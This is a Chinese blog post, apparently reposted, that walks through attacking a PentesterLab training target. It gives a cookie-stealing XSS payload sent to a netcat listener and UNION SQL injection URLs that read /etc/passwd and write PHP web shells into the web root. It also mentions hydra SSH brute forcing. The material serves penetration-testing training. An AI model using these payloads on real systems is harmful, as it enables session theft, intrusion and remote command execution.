web 攻击靶机

Posted p201521420046

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了web 攻击靶机相关的知识,希望对你有一定的参考价值。

sql注入靶机攻击过程请参考

https://pentesterlab.com/exercises/from_sqli_to_shell/course

http://www.sohu.com/a/126855490_472906

xss靶机的攻击过程请参考

https://pentesterlab.com/exercises/xss_and_mysql_file/course

在192.168.179.140机器上打开网页:

 

 

技术分享图片

是个博客系统。

每个博客标题下面可以评价:

 测试下是否存在xss漏洞。

提交后有弹框弹出:

技术分享图片

进一步构造内容

<script>document.write(‘<img src="http://192.168.179.140/?‘+document.cookie+‘  "/>‘);</script>
同时在192.168.179.140机器上用nc打开80端口。

 技术分享图片

在原来机器上登陆admin账户,密码是p4ssw0rd

技术分享图片

登陆进去后查看刚才发布的评论话题。接着查看nc的返回内容。

技术分享图片

 

获取到cookie信息。

复制下cookie,打开评论所在的网页。并修改cookie的值为刚才复制的值。

技术分享图片

刷新后,发现以admin的身份登录进页面中。

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

http://192.168.179.140/admin/edit.php ?id=4 union select 1,2,3,4

可以将2和3可以显示出来。

技术分享图片

 

 

http://192.168.179.140/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4

技术分享图片

 

 

读取passwd文件,但是不能读取shadow文件。

尝试是否能够创建一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录,

技术分享图片

 

 

查看网页源码时发现有css目录

 技术分享图片

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.179.140/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.179.140/css/s.php

显示:

 技术分享图片

说明s.php文件成功写入到/var/www/css 目录,

接下来将

<?php system($_GET[‘c‘]); ?>

写入z.php中,构造url为:

http://192.168.179.140/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

 技术分享图片

下面写入一句话木马,构造url:

http://192.168.179.140/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%[email protected]($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀链接:

技术分享图片

之前发现机器开了ssh,因此用hydra爆破下:

技术分享图片

 ssh登陆

技术分享图片

 


以上是关于web 攻击靶机的主要内容,如果未能解决你的问题,请参考以下文章

xss简单使用

渗透测试-靶机打靶思路与方法

网络攻防:攻击机(Ubuntu)和靶机(win2000server)的搭建

20145235李涛《网络对抗》Exp5 MSF基础应用

靶机渗透DC-1

漏洞复现-CVE-2017-4971-Spring Web Flow 远程代码执行